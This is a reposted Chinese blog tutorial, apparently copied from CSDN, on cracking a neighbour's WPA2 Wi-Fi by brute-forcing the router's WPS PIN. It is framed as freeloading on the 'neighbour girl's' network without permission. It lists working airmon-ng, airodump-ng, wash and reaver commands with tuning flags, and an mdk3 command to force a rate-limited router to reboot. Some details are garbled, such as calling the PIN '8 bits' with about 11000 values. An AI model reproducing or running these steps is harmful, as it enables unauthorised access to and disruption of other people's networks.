當前位置:網站首頁>測試路由對路由進行靜態配置

測試路由對路由進行靜態配置

2022-01-27 10:47:41 ╱℡&▓

大家好,我是冰河~~

今天高高興興的回到家,打開電腦,我靠,沒網!咋回事?連手機熱點也賊慢。要不蹭網?下載萬能鑰匙?果斷不能用萬能鑰匙!因為使用了萬能鑰匙,自家的Wifi密碼也會共享出去。那麼,怎麼辦?這難不倒我,於是,我打開了我的Kali操作系統,瞄准了隔壁妹子的Wifi。

WPA2-PSK加密原理
現在的路由器大多都默認用 WPA2-PSK 方式對無線網絡進行加密了,不能再像 WEP 加密方式那樣好破解,使用字典又需要費心費力地整理字典,而且字典破解的效率還慢。所以我們需要更有效率的破解方法。好在現在大多數的路由器都提供 WPS 功能,通過這個功能,用戶可以使用 PIN 碼登錄到路由器。但這個 PIN 碼的長度只有 8 比特,而且可能的取值只有11000種(注意,不是 108 種)。所以我們可以進行簡單粗暴的窮舉 PIN 碼破解,而且我們可以推斷出這種破解方法在目標 AP 開啟了 WPS 功能的情况下是可以百分之百破解它的。這其實是很老的破解手段了,但至今依然奏效。

操作步驟

1.切換無線網卡到監聽模式

airmon-ng  start  wlan0
  • 1

2刺探附近 WLAN 網絡(這個命令所跟的參數值可以在 步驟1 完成後從提示信息中查看到)

airodump-ng  wlan0mon

 

3.找出開啟了 WPS 功能、可以使用 PIN碼 登錄的路由器,並另外記錄下該 AP 的 BSSID(約等於該 AP 的 MAC 地址)

wash  -i  wlan0mon

 

 

4.開始進行 PIN碼 窮舉破解(注意末尾的參數是 2 個小寫字母 v)

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv
1
參數說明:
-i 無線網卡名稱
-b 目標AP的mac地址
-a 自動檢測目標AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-vv 顯示更多的非嚴重警告(注意這是 2 個小寫字母 v)
-d 即delay每窮舉一次的閑置時間 預設為1秒
-c 信道編號
-p PIN碼四比特或八比特 //可以用8比特直接找到密碼。

破解時推薦使用這個命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因為–d9 –t9參數可以防止pin死路由器。

 5.等待破解完成(這個破解可能會時間比較長,和你的目標 AP 有關,隔壁妹子沒有網絡安全意識,密碼很脆弱,只用了幾分鐘便破解了),這期間我們可以查看到窮舉破解花費的時間、預計剩餘時間、窮舉PIN碼進度 信息

 6.成功

 在這裏插入圖片描述

7.成功聯網 

在這裏插入圖片描述 

 在這裏插入圖片描述

 在這裏插入圖片描述

 在這裏插入圖片描述

 

注意事項
如果在執行 reaver 命令後看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 這樣的提示信息,那麼應該是你選擇了一個不具備或關閉了 WPS 功能的路由器。這種情况下就執行wash 命令並重新選擇一個路由器吧。

如果在執行 reaver 命令後看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 這樣的提示信息,這錶示目標路由器開啟了防 PIN破解 功能。因為我們是窮舉 PIN碼 進行破解的,當連續使用超過某個次數的 PIN碼 後,路由器會暫時鎖定 WPS 功能一段時間。這種情况下要麼我們耐心等待其恢複 WPS 功能,要麼執行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (這是上面的目標AP的MAC地址)命令讓路由器主動重啟或被動重啟以恢複 WPS 功能。

如果文章對你有點幫助,小夥伴們收藏、點贊、評論,走起呀~~

好了,今天就到這兒吧,我冰河,我們下期見~~
————————————————
版權聲明:本文為CSDN博主「冰 河」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/l1028386804/article/details/116477701

版權聲明
本文為[╱℡&▓]所創,轉載請帶上原文鏈接,感謝
https://cht.chowdera.com/2022/01/202201271047408904.html

隨機推薦